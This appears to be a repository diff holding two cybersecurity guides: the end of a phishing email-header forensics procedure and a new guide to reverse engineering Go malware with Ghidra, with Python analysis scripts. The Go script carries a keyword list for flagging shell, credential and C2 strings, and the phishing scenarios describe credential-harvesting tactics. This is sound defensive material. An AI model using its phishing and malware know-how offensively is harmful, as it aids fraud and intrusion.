        # Subjects can be empty or contain characters that are unsafe in file names
        subject = re.sub(r'[^A-Za-z0-9._-]', '_', (msg.get_subject() or 'no_subject')[:30])
        if headers:
            # A running counter keeps file names unique across folders
            filename = f"/cases/case-2024-001/email/msg_{next(counter)}_{subject}.txt"
            with open(filename, 'w') as f:
                f.write(headers)
    for i in range(folder.get_number_of_sub_folders()):
        extract_messages(folder.get_sub_folder(i))

extract_messages(root)
PYEOF
|
||||
```
|
||||
|
||||
### Step 2: Parse the Email Header Chain
|
||||
|
||||
```bash
|
||||
# Parse headers using Python email library
|
||||
python3 << 'PYEOF'
import email
from email import policy

# Read in binary mode so non-UTF-8 bytes in the message do not raise decode errors
with open('/cases/case-2024-001/email/phishing_email.eml', 'rb') as f:
    msg = email.message_from_binary_file(f, policy=policy.default)

print("=== KEY HEADER FIELDS ===")
print(f"From: {msg['From']}")
print(f"To: {msg['To']}")
print(f"Subject: {msg['Subject']}")
print(f"Date: {msg['Date']}")
print(f"Message-ID: {msg['Message-ID']}")
print(f"Reply-To: {msg['Reply-To']}")
print(f"Return-Path: {msg['Return-Path']}")
print(f"X-Mailer: {msg['X-Mailer']}")
print(f"X-Originating-IP: {msg['X-Originating-IP']}")

print("\n=== RECEIVED HEADERS (bottom-up = chronological) ===")
received_headers = msg.get_all('Received')
if received_headers:
    for i, header in enumerate(reversed(received_headers)):
        print(f"\nHop {i+1}: {header.strip()}")

print("\n=== AUTHENTICATION RESULTS ===")
auth_results = msg.get_all('Authentication-Results')
if auth_results:
    for result in auth_results:
        print(result)

print(f"\nARC-Authentication-Results: {msg.get('ARC-Authentication-Results', 'Not present')}")
print(f"Received-SPF: {msg.get('Received-SPF', 'Not present')}")
print(f"DKIM-Signature: {msg.get('DKIM-Signature', 'Not present')}")
PYEOF
|
||||
```
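
The Authentication-Results values printed above can be reduced to a compact verdict for the report. The sketch below uses a deliberately simple regular expression rather than a full parser for the header grammar; `parse_auth_results` and the sample header are hypothetical.

```python
import re


def parse_auth_results(header_value):
    """Extract spf/dkim/dmarc verdicts from an Authentication-Results header value."""
    verdicts = {}
    for match in re.finditer(r'\b(spf|dkim|dmarc)\s*=\s*([a-zA-Z]+)', header_value):
        # If a method appears more than once (e.g. two DKIM signatures), the last one wins
        verdicts[match.group(1).lower()] = match.group(2).lower()
    return verdicts


# Made-up header value for illustration
sample = ("mx.target-company.com; spf=fail smtp.mailfrom=examp1e-corp.com; "
          "dkim=none; dmarc=fail (p=NONE) header.from=examp1e-corp.com")
print(parse_auth_results(sample))
```

Only trust an Authentication-Results header whose leading server name belongs to your own mail infrastructure, since a sender can include a forged copy of this header.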
|
||||
|
||||
### Step 3: Validate SPF, DKIM, and DMARC Records
|
||||
|
||||
```bash
|
||||
# Extract the envelope sender domain
|
||||
SENDER_DOMAIN="example-corp.com"
|
||||
|
||||
# Check SPF record
|
||||
dig TXT $SENDER_DOMAIN +short | grep "v=spf1"
|
||||
# Example: "v=spf1 include:_spf.google.com include:sendgrid.net ~all"
|
||||
|
||||
# Check DKIM record (selector from DKIM-Signature header, e.g., "s=selector1")
|
||||
DKIM_SELECTOR="selector1"
|
||||
dig TXT ${DKIM_SELECTOR}._domainkey.${SENDER_DOMAIN} +short
|
||||
|
||||
# Check DMARC record
|
||||
dig TXT _dmarc.${SENDER_DOMAIN} +short
|
||||
# Example: "v=DMARC1; p=reject; rua=mailto:dmarc@example-corp.com; pct=100"
|
||||
|
||||
# Verify the sending IP against SPF
|
||||
# Use the connecting IP recorded in the Received header added by your own border MX
|
||||
SENDING_IP="203.0.113.45"
|
||||
|
||||
# Manual SPF check using python
|
||||
python3 << 'PYEOF'
|
||||
import spf # pip install pyspf
|
||||
|
||||
result, explanation = spf.check2(
|
||||
i='203.0.113.45',
|
||||
s='sender@example-corp.com',
|
||||
h='mail.example-corp.com'
|
||||
)
|
||||
print(f"SPF Result: {result}")
|
||||
print(f"Explanation: {explanation}")
|
||||
# Results: pass, fail, softfail, neutral, none, temperror, permerror
|
||||
PYEOF
|
||||
|
||||
# Check if sending IP is in known malicious IP lists
|
||||
# Query AbuseIPDB or VirusTotal
|
||||
curl -s "https://api.abuseipdb.com/api/v2/check?ipAddress=${SENDING_IP}" \
|
||||
-H "Key: YOUR_API_KEY" -H "Accept: application/json" | python3 -m json.tool
|
||||
```
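
The DMARC record returned by `dig` is a semicolon-separated list of tags, so the policy can be pulled out with a few lines of Python. `parse_dmarc` is a hypothetical helper name, and the record is the example shown in the block above.

```python
def parse_dmarc(record):
    """Split a DMARC TXT record into a {tag: value} dictionary."""
    tags = {}
    for part in record.split(";"):
        if "=" in part:
            key, value = part.split("=", 1)
            tags[key.strip().lower()] = value.strip()
    return tags


record = "v=DMARC1; p=reject; rua=mailto:dmarc@example-corp.com; pct=100"
policy_tags = parse_dmarc(record)
print(policy_tags["p"], policy_tags.get("pct", "100"))
```

A domain publishing `p=none` only monitors, so a DMARC failure for such a domain will usually still be delivered; that context belongs in the report next to the raw result.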
|
||||
|
||||
### Step 4: Analyze Sender Domain and Infrastructure
|
||||
|
||||
```bash
|
||||
# WHOIS lookup on sender domain
|
||||
whois $SENDER_DOMAIN | grep -iE '(registrar|creation|expiration|registrant|nameserver)'
|
||||
|
||||
# Check domain age (recently registered domains are suspicious)
|
||||
# DNS record investigation
|
||||
dig A $SENDER_DOMAIN +short
|
||||
dig MX $SENDER_DOMAIN +short
|
||||
dig NS $SENDER_DOMAIN +short
|
||||
|
||||
# Reverse DNS on sending IP
|
||||
dig -x $SENDING_IP +short
|
||||
|
||||
# Check for lookalike/typosquatting domains
|
||||
# Compare with legitimate domain using visual similarity
|
||||
python3 << 'PYEOF'
|
||||
import Levenshtein # pip install python-Levenshtein
|
||||
|
||||
legitimate = "microsoft.com"
|
||||
suspicious = "micr0soft.com"
|
||||
|
||||
distance = Levenshtein.distance(legitimate, suspicious)
|
||||
ratio = Levenshtein.ratio(legitimate, suspicious)
|
||||
print(f"Edit distance: {distance}")
|
||||
print(f"Similarity ratio: {ratio:.2%}")
|
||||
if ratio > 0.8:
    print("WARNING: Likely typosquatting/lookalike domain!")
|
||||
PYEOF
|
||||
|
||||
# Check domain reputation on VirusTotal
|
||||
curl -s "https://www.virustotal.com/api/v3/domains/${SENDER_DOMAIN}" \
|
||||
-H "x-apikey: YOUR_VT_API_KEY" | python3 -m json.tool
|
||||
|
||||
# Check if the Reply-To differs from From (common phishing indicator)
|
||||
python3 -c "
import email
import email.utils
with open('/cases/case-2024-001/email/phishing_email.eml') as f:
    msg = email.message_from_file(f)
from_addr = email.utils.parseaddr(msg['From'])[1]
reply_to = email.utils.parseaddr(msg.get('Reply-To', msg['From']))[1]
if from_addr != reply_to:
    print(f'WARNING: From ({from_addr}) != Reply-To ({reply_to})')
else:
    print('From and Reply-To match')
"
|
||||
```
|
||||
|
||||
### Step 5: Examine Email Body and Attachments
|
||||
|
||||
```bash
|
||||
# Extract URLs from email body
|
||||
python3 << 'PYEOF'
import email
import hashlib
import os
import re
from email import policy

# Read in binary mode so non-UTF-8 bytes in the message do not raise decode errors
with open('/cases/case-2024-001/email/phishing_email.eml', 'rb') as f:
    msg = email.message_from_binary_file(f, policy=policy.default)

body = msg.get_body(preferencelist=('html', 'plain'))
if body:
    content = body.get_content()
    urls = re.findall(r'https?://[^\s<>"\']+', content)
    print("=== URLs FOUND IN EMAIL BODY ===")
    for url in sorted(set(urls)):
        print(f"  {url}")

    # Check for URL obfuscation (display text != href)
    href_pattern = re.findall(r'<a[^>]*href=["\']([^"\']+)["\'][^>]*>(.*?)</a>', content, re.DOTALL)
    print("\n=== HYPERLINK ANALYSIS ===")
    for href, text in href_pattern:
        display_url = re.findall(r'https?://[^\s<]+', text)
        if display_url and display_url[0] != href:
            print(f"  MISMATCH: Display='{display_url[0]}' -> Actual='{href}'")

# Extract and hash attachments
attachment_dir = '/cases/case-2024-001/email/attachments'
os.makedirs(attachment_dir, exist_ok=True)
print("\n=== ATTACHMENTS ===")
for part in msg.walk():
    if part.get_content_disposition() == 'attachment':
        # Strip directory components so a crafted name cannot escape the case folder
        filename = os.path.basename(part.get_filename() or 'unnamed_attachment')
        payload = part.get_payload(decode=True)
        if payload is None:
            continue  # container parts such as attached messages carry no direct payload
        sha256 = hashlib.sha256(payload).hexdigest()
        print(f"  File: {filename}, Size: {len(payload)}, SHA-256: {sha256}")
        with open(os.path.join(attachment_dir, filename), 'wb') as af:
            af.write(payload)
PYEOF
|
||||
|
||||
# Submit attachment hashes to VirusTotal
|
||||
# Submit URLs to URLhaus or PhishTank for reputation check
|
||||
```
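
Before the extracted URLs and IPs are pasted into a ticket or report, it is common practice to defang them so they cannot be clicked by accident. A minimal sketch, with `defang` as a hypothetical helper name:

```python
def defang(indicator):
    """Rewrite a URL, domain, or IP so it is no longer clickable or auto-linked."""
    if indicator.lower().startswith("http"):
        # http -> hxxp, https -> hxxps
        indicator = "hxxp" + indicator[4:]
    return indicator.replace(".", "[.]")


print(defang("https://evil-tunnel.com/login"))
print(defang("203.0.113.45"))
```

Keep the original, unmodified indicators in the case files; the defanged form is only for human-readable output.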
|
||||
|
||||
## Key Concepts
|
||||
|
||||
| Concept | Description |
|
||||
|---------|-------------|
|
||||
| SPF (Sender Policy Framework) | DNS record specifying authorized mail servers for a domain |
|
||||
| DKIM (DomainKeys Identified Mail) | Cryptographic signature verifying email content integrity |
|
||||
| DMARC | Policy framework that requires SPF or DKIM to pass in alignment with the From domain and tells receivers how to handle failures |
|
||||
| Received headers | Server-added headers showing each hop in the delivery chain (read bottom to top) |
|
||||
| Return-Path | Envelope sender address used for bounce messages; may differ from From |
|
||||
| Message-ID | Unique identifier assigned by the originating mail server |
|
||||
| X-Originating-IP | Original sender IP address (added by some mail services) |
|
||||
| Header forgery | Attackers can forge From, Reply-To, and even prepend fake Received lines; only Received headers added by servers you control or trust are reliable |
|
||||
|
||||
## Tools & Systems
|
||||
|
||||
| Tool | Purpose |
|
||||
|------|---------|
|
||||
| MXToolbox | Online email header analyzer and DNS lookup |
|
||||
| dig/nslookup | DNS record queries for SPF, DKIM, DMARC verification |
|
||||
| pyspf | Python SPF record validation library |
|
||||
| dkimpy | Python DKIM signature verification library |
|
||||
| PhishTool | Specialized phishing email analysis platform |
|
||||
| VirusTotal | URL and file reputation checking service |
|
||||
| AbuseIPDB | IP address reputation database |
|
||||
| whois | Domain registration information lookup |
|
||||
|
||||
## Common Scenarios
|
||||
|
||||
**Scenario 1: CEO Fraud / Business Email Compromise**
|
||||
The email claims to be from the CEO but Reply-To points to a Gmail address, SPF fails because the sending IP is not authorized for the spoofed domain, DKIM is missing, and the From domain is a lookalike (ceo-company.com vs company.com).
|
||||
|
||||
**Scenario 2: Credential Harvesting Phishing**
|
||||
Email contains a link that displays "login.microsoft.com" but href points to a lookalike domain, the attachment is an HTML file containing a fake login page with credential exfiltration JavaScript, the sending domain was registered 3 days ago.
|
||||
|
||||
**Scenario 3: Malware Delivery via Attachment**
|
||||
Email with an Office document attachment containing macros, the sender domain passes SPF but the account was compromised, DKIM signature is valid (sent from legitimate infrastructure), attachment SHA-256 matches known malware on VirusTotal.
|
||||
|
||||
**Scenario 4: Spear Phishing with Legitimate Service**
|
||||
Attacker uses a legitimate email marketing service to send phishing, SPF and DKIM pass because the service is authorized, the phishing is in the content not the infrastructure, requires URL and content analysis rather than header authentication checks.
|
||||
|
||||
## Output Format
|
||||
|
||||
```
|
||||
Email Header Analysis Report:
|
||||
Subject: "Urgent: Invoice Payment Required"
|
||||
From: accounting@examp1e-corp.com (SPOOFED)
|
||||
Reply-To: payments.urgent@gmail.com (MISMATCH)
|
||||
Return-Path: <bounce@mail-server.xyz>
|
||||
Date: 2024-01-15 09:23:45 UTC
|
||||
|
||||
Delivery Path (4 hops):
|
||||
Hop 1: mail-server.xyz [203.0.113.45] -> relay1.isp.com
|
||||
Hop 2: relay1.isp.com -> mx.target-company.com
|
||||
Hop 3: mx.target-company.com -> internal-filter.target.com
|
||||
Hop 4: internal-filter.target.com -> mailbox
|
||||
|
||||
Authentication:
|
||||
SPF: FAIL (203.0.113.45 not authorized for examp1e-corp.com)
|
||||
DKIM: NONE (no signature present)
|
||||
DMARC: FAIL (p=none, no enforcement)
|
||||
|
||||
Indicators of Phishing:
|
||||
- Lookalike domain (examp1e-corp.com vs example-corp.com, 96% similar)
|
||||
- From/Reply-To mismatch
|
||||
- Domain registered 2 days before email sent
|
||||
- URL in body points to credential harvesting page
|
||||
- Attachment: invoice.xlsm (SHA-256: a3f2...) - Known malware on VT
|
||||
|
||||
Risk Level: HIGH
|
||||
```
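
The Authentication block of a report like the one above is typically derived from the `Authentication-Results` header added by the receiving mail server. The sketch below shows one way to pull out the SPF, DKIM, and DMARC verdicts. The header value is made up for illustration, and `risk_level` is a hypothetical triage rule, not a scoring method defined by this skill.

```python
import re

# Matches "spf=fail", "dkim=none", "dmarc=pass" and similar tokens.
AUTH_RESULT = re.compile(r"\b(spf|dkim|dmarc)=([a-z]+)", re.IGNORECASE)


def parse_auth_results(header_value):
    """Map each mechanism (spf, dkim, dmarc) to its reported verdict."""
    results = {"spf": "none", "dkim": "none", "dmarc": "none"}
    for mechanism, verdict in AUTH_RESULT.findall(header_value):
        results[mechanism.lower()] = verdict.lower()
    return results


def risk_level(results, reply_to_mismatch):
    """Rough triage: count checks that did not pass (assumed rule)."""
    failures = sum(1 for verdict in results.values() if verdict != "pass")
    if failures >= 2 and reply_to_mismatch:
        return "HIGH"
    return "MEDIUM" if failures else "LOW"


header = (
    "mx.target-company.com; spf=fail smtp.mailfrom=examp1e-corp.com; "
    "dkim=none; dmarc=fail header.from=examp1e-corp.com"
)
parsed = parse_auth_results(header)
print(parsed, risk_level(parsed, reply_to_mismatch=True))
```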
|
||||
@@ -0,0 +1,290 @@
|
||||
---
|
||||
name: analyzing-golang-malware-with-ghidra
|
||||
description: Reverse engineer Go-compiled malware using Ghidra with specialized scripts for function recovery, string extraction, and type reconstruction in stripped Go binaries.
|
||||
domain: cybersecurity
|
||||
subdomain: malware-analysis
|
||||
tags: [golang, ghidra, reverse-engineering, malware-analysis, binary-analysis, go-malware, disassembly]
|
||||
version: "1.0"
|
||||
author: mahipal
|
||||
license: MIT
|
||||
---
|
||||
# Analyzing Golang Malware with Ghidra
|
||||
|
||||
## Overview
|
||||
|
||||
Go (Golang) has become a popular language for malware authors due to its cross-compilation capabilities, static linking that produces self-contained binaries, and the complexity it introduces for reverse engineering. Go binaries contain the entire runtime, standard library, and all dependencies statically linked, resulting in large binaries (often 5-15MB) with thousands of functions. Ghidra struggles with Go-specific string formats (non-null-terminated), stripped function names, and goroutine concurrency patterns. Specialized tools like GoResolver (Volexity, 2025) use control-flow graph similarity to automatically deobfuscate and recover function names in stripped or obfuscated Go binaries.
|
||||
|
||||
## Prerequisites
|
||||
|
||||
- Ghidra 11.0+ with JDK 17+
|
||||
- GoResolver plugin (for function name recovery)
|
||||
- Go Reverse Engineering Tool Kit (go-re.tk)
|
||||
- Python 3.9+ for helper scripts
|
||||
- Understanding of Go runtime internals (goroutines, channels, interfaces)
|
||||
- Familiarity with Go binary structure (pclntab, moduledata, itab)
|
||||
|
||||
## Key Concepts
|
||||
|
||||
### Go Binary Structure
|
||||
|
||||
Go binaries embed rich metadata in the `pclntab` (PC Line Table) structure, which maps program counters to function names, source files, and line numbers. Even stripped binaries retain this metadata. The `moduledata` structure contains pointers to type information, itabs (interface tables), and the pclntab itself. Go strings are stored as a pointer-length pair rather than null-terminated C strings.
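
A 4-byte magic value alone produces false positives when scanning a large binary, so it helps to validate the rest of the pclntab header. The sketch below assumes a little-endian target and uses the header layout and magic constants from Go's `debug/gosym` package (4-byte magic, two zero bytes, a PC quantum of 1, 2, or 4, and a pointer size of 4 or 8). The function names are illustrative.

```python
import struct

# Magic values as little-endian uint32, per Go's debug/gosym package.
PCLNTAB_MAGICS = {
    0xFFFFFFFB: "Go 1.2-1.15",
    0xFFFFFFFA: "Go 1.16-1.17",
    0xFFFFFFF0: "Go 1.18-1.19",
    0xFFFFFFF1: "Go 1.20+",
}


def parse_pclntab_header(data, offset):
    """Return header fields if a plausible pclntab header starts at offset."""
    if offset + 8 > len(data):
        return None
    magic, pad1, pad2, min_lc, ptr_size = struct.unpack_from("<IBBBB", data, offset)
    if magic not in PCLNTAB_MAGICS:
        return None
    # Two zero pad bytes, instruction quantum 1/2/4, pointer size 4/8.
    if pad1 or pad2 or min_lc not in (1, 2, 4) or ptr_size not in (4, 8):
        return None
    return {"version": PCLNTAB_MAGICS[magic], "min_lc": min_lc, "ptr_size": ptr_size}


def find_pclntab(data):
    """Return (offset, header) for the first candidate that passes validation."""
    for magic in PCLNTAB_MAGICS:
        needle = struct.pack("<I", magic)
        pos = data.find(needle)
        while pos != -1:
            header = parse_pclntab_header(data, pos)
            if header:
                return pos, header
            pos = data.find(needle, pos + 1)
    return None, None


# Synthetic buffer: a Go 1.20+ header (quantum 1, 8-byte pointers) at offset 16.
blob = b"\x00" * 16 + b"\xf1\xff\xff\xff\x00\x00\x01\x08" + b"\x00" * 16
print(find_pclntab(blob))
```

Big-endian targets store the magic in the opposite byte order and are not handled by this sketch.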
|
||||
|
||||
### Function Recovery in Stripped Binaries
|
||||
|
||||
Despite stripping symbol tables, Go binaries retain function names within the pclntab. However, obfuscation tools like garble rename functions to random strings. GoResolver addresses this by computing control-flow graph signatures of obfuscated functions and matching them against a database of known Go standard library and third-party package functions.
|
||||
|
||||
### Module/Dependency Extraction
|
||||
|
||||
Go's dependency management embeds module paths and version strings in the binary. Extracting these reveals the malware's third-party dependencies (HTTP libraries, encryption packages, C2 frameworks), which provides insight into capabilities without full reverse engineering.
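
For binaries built with Go 1.18 or later, the module list can be read directly from the build info blob instead of pattern-matching the whole file. The following is a sketch under stated assumptions: it follows the inline-string layout used by Go's `debug/buildinfo` package (14-byte magic, pointer size, flags byte, strings starting at offset 32), skips the older pointer-based layout, and does no bounds checking on truncated input. The sample blob is synthetic and uses zero bytes as stand-ins for the real 16-byte sentinels.

```python
BUILDINFO_MAGIC = b"\xff Go buildinf:"


def read_uvarint(buf, pos):
    """Decode a base-128 unsigned varint; return (value, next_pos)."""
    value, shift = 0, 0
    while True:
        byte = buf[pos]
        pos += 1
        value |= (byte & 0x7F) << shift
        if byte < 0x80:
            return value, pos
        shift += 7


def read_string(buf, pos):
    """Read a varint-length-prefixed byte string; return (bytes, next_pos)."""
    length, pos = read_uvarint(buf, pos)
    return buf[pos:pos + length], pos + length


def parse_buildinfo(data):
    """Return (go_version, [(module, version), ...]) or None if unsupported."""
    start = data.find(BUILDINFO_MAGIC)
    if start == -1 or len(data) < start + 32:
        return None
    flags = data[start + 15]
    if not flags & 0x2:
        return None  # pointer-based layout (pre-1.18) is not handled here
    version, pos = read_string(data, start + 32)
    modinfo, _ = read_string(data, pos)
    # Module info is framed by a 16-byte sentinel on each side.
    if len(modinfo) >= 33 and modinfo[-17:-16] == b"\n":
        modinfo = modinfo[16:-16]
    deps = []
    for line in modinfo.decode("utf-8", errors="replace").splitlines():
        fields = line.split("\t")
        if fields[0] == "dep" and len(fields) >= 3:
            deps.append((fields[1], fields[2]))
    return version.decode("utf-8", errors="replace"), deps


# Synthetic sample: header, version string, then framed module info.
body = (b"path\tevil\nmod\tevil\t(devel)\t\n"
        b"dep\tgithub.com/gorilla/websocket\tv1.5.0\th1:abc=\n")
framed = b"\x00" * 16 + body + b"\x00" * 16
sample = (BUILDINFO_MAGIC + bytes([8, 2]) + b"\x00" * 16
          + bytes([8]) + b"go1.21.0"
          + bytes([len(framed)]) + framed)
print(parse_buildinfo(sample))
```

Obfuscators and manual tampering can strip or falsify this blob, so treat its absence as a finding in itself rather than as proof that the binary has no dependencies.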
|
||||
|
||||
## Practical Steps
|
||||
|
||||
### Step 1: Initial Binary Analysis
|
||||
|
||||
```python
|
||||
#!/usr/bin/env python3
|
||||
"""Analyze Go binary metadata for malware analysis."""
|
||||
import struct
|
||||
import sys
|
||||
import re
|
||||
|
||||
|
||||
def find_go_build_info(data):
|
||||
"""Extract Go build information from binary."""
|
||||
# Go buildinfo magic: \xff Go buildinf:
|
||||
magic = b'\xff Go buildinf:'
|
||||
offset = data.find(magic)
|
||||
if offset == -1:
|
||||
return None
|
||||
|
||||
print(f"[+] Go build info at offset 0x{offset:x}")
|
||||
|
||||
# Extract Go version string nearby
|
||||
go_version = re.search(rb'go\d+\.\d+(?:\.\d+)?', data[offset:offset+256])
|
||||
if go_version:
|
||||
print(f" Go Version: {go_version.group().decode()}")
|
||||
|
||||
return offset
|
||||
|
||||
|
||||
def find_pclntab(data):
|
||||
"""Locate the pclntab (PC Line Table) structure."""
|
||||
# pclntab magic bytes vary by Go version
|
||||
magics = {
|
||||
b'\xfb\xff\xff\xff\x00\x00': "Go 1.2-1.15",
|
||||
b'\xfa\xff\xff\xff\x00\x00': "Go 1.16-1.17",
|
||||
b'\xf0\xff\xff\xff\x00\x00': "Go 1.18-1.19",
|
||||
b'\xf1\xff\xff\xff\x00\x00': "Go 1.20+",
|
||||
}
|
||||
|
||||
for magic, version in magics.items():
|
||||
offset = data.find(magic)
|
||||
if offset != -1:
|
||||
print(f"[+] pclntab found at 0x{offset:x} ({version})")
|
||||
return offset, version
|
||||
|
||||
return None, None
|
||||
|
||||
|
||||
def extract_function_names(data, pclntab_offset):
|
||||
"""Extract likely function names by regex over the whole file (the pclntab itself is not parsed)."""
|
||||
if pclntab_offset is None:
|
||||
return []
|
||||
|
||||
functions = []
|
||||
# Function name strings follow specific patterns
|
||||
func_pattern = re.compile(
|
||||
rb'(?:main|runtime|fmt|net|os|crypto|encoding|io|sync|'
|
||||
rb'syscall|reflect|strings|bytes|path|time|math|sort|'
|
||||
rb'github\.com|golang\.org)[/\.][\w/.]+',
|
||||
)
|
||||
|
||||
for match in func_pattern.finditer(data):
|
||||
name = match.group().decode('utf-8', errors='replace')
|
||||
if len(name) > 4 and len(name) < 200:
|
||||
functions.append(name)
|
||||
|
||||
return sorted(set(functions))
|
||||
|
||||
|
||||
def extract_go_strings(data):
|
||||
"""Extract printable ASCII runs that contain suspicious keywords (pointer+length headers are not followed)."""
|
||||
# Go strings are not null-terminated; extract readable sequences
|
||||
strings = []
|
||||
ascii_pattern = re.compile(rb'[\x20-\x7e]{10,}')
|
||||
|
||||
for match in ascii_pattern.finditer(data):
|
||||
s = match.group().decode('ascii')
|
||||
# Filter for interesting malware strings
|
||||
interesting = [
|
||||
'http', 'https', 'tcp', 'udp', 'dns',
|
||||
'cmd', 'shell', 'exec', 'upload', 'download',
|
||||
'encrypt', 'decrypt', 'key', 'token', 'password',
|
||||
'c2', 'beacon', 'agent', 'implant', 'bot',
|
||||
'mutex', 'persist', 'registry', 'scheduled',
|
||||
]
|
||||
if any(kw in s.lower() for kw in interesting):
|
||||
strings.append(s)
|
||||
|
||||
return strings
|
||||
|
||||
|
||||
def extract_dependencies(data):
|
||||
"""Extract Go module dependencies from binary."""
|
||||
deps = []
|
||||
# Module paths follow pattern: github.com/user/repo
|
||||
dep_pattern = re.compile(
|
||||
rb'((?:github\.com|gitlab\.com|golang\.org|gopkg\.in|'
|
||||
rb'go\.etcd\.io|google\.golang\.org)/[^\x00\s]{5,80})'
|
||||
)
|
||||
|
||||
for match in dep_pattern.finditer(data):
|
||||
dep = match.group().decode('utf-8', errors='replace')
|
||||
deps.append(dep)
|
||||
|
||||
unique_deps = sorted(set(deps))
|
||||
return unique_deps
|
||||
|
||||
|
||||
def analyze_go_binary(filepath):
|
||||
"""Full analysis of Go malware binary."""
|
||||
with open(filepath, 'rb') as f:
|
||||
data = f.read()
|
||||
|
||||
print(f"[+] Analyzing Go binary: {filepath}")
|
||||
print(f" File size: {len(data):,} bytes")
|
||||
print("=" * 60)
|
||||
|
||||
# Build info
|
||||
find_go_build_info(data)
|
||||
|
||||
# pclntab
|
||||
pclntab_offset, go_version = find_pclntab(data)
|
||||
|
||||
# Functions
|
||||
functions = extract_function_names(data, pclntab_offset)
|
||||
print(f"\n[+] Recovered {len(functions)} function names")
|
||||
|
||||
# Categorize functions
|
||||
categories = {
|
||||
"network": [], "crypto": [], "os_exec": [],
|
||||
"file_io": [], "main": [], "third_party": [],
|
||||
}
|
||||
for f in functions:
|
||||
if 'net/' in f or 'http' in f.lower():
|
||||
categories["network"].append(f)
|
||||
elif 'crypto' in f:
|
||||
categories["crypto"].append(f)
|
||||
elif 'os/exec' in f or 'syscall' in f:
|
||||
categories["os_exec"].append(f)
|
||||
elif 'os.' in f or 'io/' in f:
|
||||
categories["file_io"].append(f)
|
||||
elif f.startswith('main.'):
|
||||
categories["main"].append(f)
|
||||
elif 'github.com' in f or 'golang.org' in f:
|
||||
categories["third_party"].append(f)
|
||||
|
||||
for cat, funcs in categories.items():
|
||||
if funcs:
|
||||
print(f"\n [{cat}] ({len(funcs)} functions):")
|
||||
for fn in funcs[:10]:
|
||||
print(f" {fn}")
|
||||
|
||||
# Dependencies
|
||||
deps = extract_dependencies(data)
|
||||
print(f"\n[+] Dependencies ({len(deps)}):")
|
||||
for dep in deps[:20]:
|
||||
print(f" {dep}")
|
||||
|
||||
# Suspicious strings
|
||||
sus_strings = extract_go_strings(data)
|
||||
print(f"\n[+] Suspicious strings ({len(sus_strings)}):")
|
||||
for s in sus_strings[:20]:
|
||||
print(f" {s}")
|
||||
|
||||
|
||||
if __name__ == "__main__":
|
||||
if len(sys.argv) < 2:
|
||||
print(f"Usage: {sys.argv[0]} <go_binary>")
|
||||
sys.exit(1)
|
||||
analyze_go_binary(sys.argv[1])
|
||||
```
|
||||
|
||||
### Step 2: Ghidra Analysis Script
|
||||
|
||||
```python
|
||||
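# Ghidra script (run from Ghidra's Script Manager; the f-strings and bytes() calls below need a Python 3 runtime such as PyGhidra or Ghidrathon, not the default Jython 2.7)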
|
||||
# Save as AnalyzeGoBinary.py in Ghidra scripts directory
|
||||
|
||||
# @category MalwareAnalysis
|
||||
# @description Analyze Go binary structure and recover metadata
|
||||
|
||||
def analyze_go_binary_ghidra():
|
||||
"""Ghidra script for Go binary analysis."""
|
||||
from ghidra.program.model.mem import MemoryAccessException
|
||||
|
||||
program = getCurrentProgram()
|
||||
memory = program.getMemory()
|
||||
listing = program.getListing()
|
||||
|
||||
print("[+] Go Binary Analysis Script")
|
||||
print(f" Program: {program.getName()}")
|
||||
|
||||
# Find pclntab
|
||||
pclntab_magics = [
|
||||
bytes([0xf1, 0xff, 0xff, 0xff]), # Go 1.20+
|
||||
bytes([0xf0, 0xff, 0xff, 0xff]), # Go 1.18-1.19
|
||||
bytes([0xfa, 0xff, 0xff, 0xff]), # Go 1.16-1.17
|
||||
bytes([0xfb, 0xff, 0xff, 0xff]), # Go 1.2-1.15
|
||||
]
|
||||
|
||||
for magic in pclntab_magics:
|
||||
addr = memory.findBytes(
|
||||
program.getMinAddress(), magic, None, True, None
|
||||
)
|
||||
if addr:
|
||||
print(f"[+] pclntab found at {addr}")
|
||||
# Create label (SourceType must be imported before it can be referenced)
|
||||
from ghidra.program.model.symbol import SourceType
|
||||
program.getSymbolTable().createLabel(
|
||||
addr, "go_pclntab", None, SourceType.ANALYSIS
|
||||
)
|
||||
break
|
||||
|
||||
# Go string fix-up (placeholder: this script does not yet redefine strings)
|
||||
# Go strings are ptr+len, not null-terminated
|
||||
print("[!] Go string fix-up is not implemented in this script")
|
||||
|
||||
# Search for function names containing package paths
|
||||
symbol_table = program.getSymbolTable()
|
||||
func_count = 0
|
||||
for symbol in symbol_table.getAllSymbols(True):
|
||||
name = symbol.getName()
|
||||
if ('.' in name and
|
||||
any(pkg in name for pkg in
|
||||
['main.', 'runtime.', 'net.', 'crypto.', 'os.'])):
|
||||
func_count += 1
|
||||
|
||||
print(f"[+] Found {func_count} Go function symbols")
|
||||
|
||||
|
||||
# Execute
|
||||
analyze_go_binary_ghidra()
|
||||
```
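
Because Go strings are stored as a pointer plus a length, adjacent string data runs together with no terminator, and a C-style string scan merges it. The sketch below shows how a single string header can be resolved outside Ghidra. It assumes a little-endian target and a flat image where file offset equals virtual address minus `base_addr`; real ELF, PE, or Mach-O files need a proper section mapping. `read_go_string` and the sample data are hypothetical.

```python
import struct


def read_go_string(image, base_addr, header_offset, ptr_size=8):
    """Resolve one Go string header (pointer, length) inside a flat image."""
    fmt = "<QQ" if ptr_size == 8 else "<II"
    ptr, length = struct.unpack_from(fmt, image, header_offset)
    start = ptr - base_addr
    if start < 0 or start + length > len(image):
        return None  # header does not point inside this image
    return image[start:start + length].decode("utf-8", errors="replace")


BASE = 0x400000
# Two strings stored back to back with no separator, as Go does.
image = bytearray(b"http://c2.examplecmd.exe".ljust(32, b"\x00"))
image += struct.pack("<QQ", BASE + 0, 17)   # header for the URL
image += struct.pack("<QQ", BASE + 17, 7)   # header for "cmd.exe"
image = bytes(image)

print(read_go_string(image, BASE, 32))
print(read_go_string(image, BASE, 48))
```

A null-terminated scan of the same bytes would report the single merged string `http://c2.examplecmd.exe`, which is why the length from the header matters.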
|
||||
|
||||
## Validation Criteria
|
||||
|
||||
- Go version and build information extracted from binary
|
||||
- pclntab located and parsed for function name recovery
|
||||
- Third-party dependencies identified revealing malware capabilities
|
||||
- Main package functions enumerated for targeted analysis
|
||||
- Network, crypto, and OS exec functions categorized
|
||||
- Ghidra analysis correctly labels Go runtime structures
|
||||
|
||||
## References
|
||||
|
||||
- [CUJO AI - Reverse Engineering Go Binaries with Ghidra](https://cujo.com/blog/reverse-engineering-go-binaries-with-ghidra/)
|
||||
- [Volexity GoResolver](https://www.volexity.com/blog/2025/04/01/goresolver-using-control-flow-graph-similarity-to-deobfuscate-golang-binaries-automatically/)
|
||||
- [Go Reverse Engineering Tool Kit](https://go-re.tk/about/)
|
||||
